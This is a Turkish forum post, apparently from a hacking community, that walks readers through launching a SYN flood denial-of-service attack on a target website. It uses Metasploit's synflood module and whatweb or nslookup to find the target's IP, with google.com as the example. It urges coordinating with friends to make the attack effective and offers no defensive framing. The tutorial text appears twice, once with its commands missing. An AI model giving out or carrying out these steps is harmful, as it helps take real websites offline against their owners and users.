İyi günler normalde videolu anlatımda bulunacaktım ama kali linuxun video kaydedicisinde bir problem olduğu için makale yazmaya karar verdim.
Öncelikle SynFlood aynı dos(denial of service) da olduğu gibi hedef site sunucularına aşırı yüklenerek geçici - kalıcı şekilde sitenin çökmesine sebep olur.Sitenin güvenlik zaafiyetine göre çökmesi geçici veya tamamen olabilir.Anlatıma geçelim.
1-Terminale(uçbirim)
yazarak ****sploiti çalıştırıyoruz.
2-Çalıştırdıktan sonra msf> gelir buraya
yazıyoruz ve show options diyerek kullanım talimatlarına bakıyoruz.
3-Biz oradan RHOST u kullanacağız." set RHOST (hedef site ip adresi) diyoruz.(Ör: set RHOST 192.168.1.1)
4-Bu koddan sonra "run" yazarak saldırımızı başlatıyoruz. İşlem bu kadar...
Not: Bu işlem tek başına etki etmeyebilir birkaç arkadaşınız ile birlikte yaparsanız verim elde edebilirsiniz.
Not 2: Hedef ip adresini öğrenmek için whatweb veya nslookup yollarını kullanabiliriz.Daha bir sürü öğrenebileceğimiz toollarda var,dmitry wapiti gibi onlarıda kullanabilirsiniz.Ben whatwebi genelde tercih ediyorum.Nasıl öğreneceğimizi göstereyim.
-->Terminali açıyoruz whatweb hedef_site_url diyoruz.(Örnek whatweb google.com )
Bu şekilde sadece ip değil sitedeki subdomain iplerini,site scriptini öğrenebilirsiniz.
Umarım sizlere katkıda bulunabilmişimdir.
Hepinize İyi Forumlar ve Saygılar...
Öncelikle SynFlood aynı dos(denial of service) da olduğu gibi hedef site sunucularına aşırı yüklenerek geçici - kalıcı şekilde sitenin çökmesine sebep olur.Sitenin güvenlik zaafiyetine göre çökmesi geçici veya tamamen olabilir.Anlatıma geçelim.
1-Terminale(uçbirim)
Kod:
[B]msfconsole[/B]2-Çalıştırdıktan sonra msf> gelir buraya
Kod:
[B]use auxiliary/dos/tcp/synflood [/B]3-Biz oradan RHOST u kullanacağız." set RHOST (hedef site ip adresi) diyoruz.(Ör: set RHOST 192.168.1.1)
4-Bu koddan sonra "run" yazarak saldırımızı başlatıyoruz. İşlem bu kadar...
Not: Bu işlem tek başına etki etmeyebilir birkaç arkadaşınız ile birlikte yaparsanız verim elde edebilirsiniz.
Not 2: Hedef ip adresini öğrenmek için whatweb veya nslookup yollarını kullanabiliriz.Daha bir sürü öğrenebileceğimiz toollarda var,dmitry wapiti gibi onlarıda kullanabilirsiniz.Ben whatwebi genelde tercih ediyorum.Nasıl öğreneceğimizi göstereyim.
-->Terminali açıyoruz whatweb hedef_site_url diyoruz.(Örnek whatweb google.com )
Bu şekilde sadece ip değil sitedeki subdomain iplerini,site scriptini öğrenebilirsiniz.
Umarım sizlere katkıda bulunabilmişimdir.
Hepinize İyi Forumlar ve Saygılar...
Son düzenleme:
